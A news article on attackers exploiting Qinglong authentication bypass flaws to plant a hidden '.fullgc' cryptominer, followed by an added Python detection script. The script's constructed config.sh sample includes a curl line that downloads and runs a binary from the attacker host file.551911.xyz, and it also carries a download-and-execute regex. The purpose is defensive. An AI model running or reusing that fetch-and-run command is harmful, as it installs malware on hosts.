Hackers are exploiting two authentication bypass vulnerabilities in the Qinglong open-source task scheduling application to deploy cryptominers on developers' servers.
Exploitation started in early February, before the security issues had been disclosed publicly at the end of the month, according to researchers at cloud-native application security firm Snyk.
Qinglong is a self-hosted open-source task management platform popular among Chinese developers. It has been forked more than 3,200 times and has over 19,000 stars on GitHub.
The two security issues affect Qinglong versions 2.20.1 and older and can be chained to achieve remote code execution:
The root cause of both flaws is a mismatch between the middleware's authorization logic and Express.js routing behavior.
"Both vulnerabilities stem from a mismatch between the security middleware's assumptions and the framework's behavior," Snyk researchers note.
"The auth layer assumed certain URL patterns would always be handled one way, while Express.js treated them differently."
Snyk reports that attackers have been targeting these two flaws on publicly exposed Qinglong panels to deploy cryptominers since February 7.
This activity was first spotted by Qinglong users, who reported a rogue hidden process named '.fullgc' using between 85% and 100% of their CPU power.
The name deliberately mimics "Full GC," an innocuous but resource-intensive process, to evade detection.
According to Snyk, the attackers exploited the flaws to modify Qinglong's config.sh and injected shell commands that downloaded a miner to '/ql/files/db/.fullgc' and executed it in the background.
The remote resource located at 'file.551911.xyz' hosted several variants of the binary, including builds for Linux x86_64, ARM64, and macOS.
The attacks continued, with several confirmed infections across different setups, including deployments behind Nginx and SSL, while the Qinglong maintainers only responded to the issue on March 1.
The maintainer acknowledged the vulnerability and urged users to install the latest update. However, the mitigation in pull request #2924 focused on blocking command injection patterns, which Snyk says was insufficient.
The researchers note that the effective fix came in PR #2941, which corrected the authentication bypass in the middleware.
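For operators checking their own Qinglong hosts, here is an added example (not from the article, Snyk, or the Qinglong project) that scans `ps` output and a config.sh for the indicators the article names: the '.fullgc' process name, the '/ql/files/db/.fullgc' drop path, the 'file.551911.xyz' host, and the 85% CPU floor. The sample `ps` output and config.sh are constructed, and the function names and the generic download-and-execute heuristic are assumptions.

```python
import re

# Constructed sample of `ps -eo pid,pcpu,comm,args` output (not a real capture).
PS_SAMPLE = """\
  PID %CPU COMMAND         ARGS
    1  0.0 node            node /ql/build/app.js
  512  0.3 nginx           nginx: worker process
 4242 97.5 .fullgc         /ql/files/db/.fullgc
"""

# Constructed Qinglong config.sh with one injected line (not a real capture).
CONFIG_SAMPLE = """\
## config.sh (constructed)
DefaultCronRule="0 0 * * *"
curl -fsSL http://file.551911.xyz/x86_64 -o /ql/files/db/.fullgc && chmod +x /ql/files/db/.fullgc && nohup /ql/files/db/.fullgc &
"""

MINER_NAME = ".fullgc"                # process name reported by affected users
MINER_PATH = "/ql/files/db/.fullgc"   # drop location reported by Snyk
MINER_HOST = "file.551911.xyz"        # download host reported by Snyk
CPU_THRESHOLD = 85.0                  # low end of the reported CPU usage

def suspicious_processes(ps_text, cpu_threshold=CPU_THRESHOLD):
    """Return (pid, reason) for the known miner or a dot-prefixed command pegging the CPU."""
    hits = []
    for line in ps_text.splitlines()[1:]:      # skip the header row
        parts = line.split(None, 3)
        if len(parts) < 4:
            continue
        pid, cpu, comm, args = int(parts[0]), float(parts[1]), parts[2], parts[3]
        if comm == MINER_NAME or MINER_PATH in args:
            hits.append((pid, "known miner name/path"))
        elif comm.startswith(".") and cpu >= cpu_threshold:   # generic heuristic (assumption)
            hits.append((pid, f"hidden-style command at {cpu:.0f}% CPU"))
    return hits

def suspicious_config_lines(config_text):
    """Return (line_no, reason) for config.sh lines carrying known indicators or a fetch-and-run pattern."""
    download_exec = re.compile(r"\b(curl|wget)\b.*(\|\s*(ba)?sh\b|&&\s*(chmod|nohup|\./))")
    flagged = []
    for no, raw in enumerate(config_text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if MINER_HOST in line or MINER_PATH in line:
            flagged.append((no, "known indicator"))
        elif download_exec.search(line):
            flagged.append((no, "download-and-execute pattern"))
    return flagged
```

On a live host, feed the functions the real `ps -eo pid,pcpu,comm,args` output and the contents of the panel's config.sh; any hit warrants treating the box as compromised rather than just killing the process.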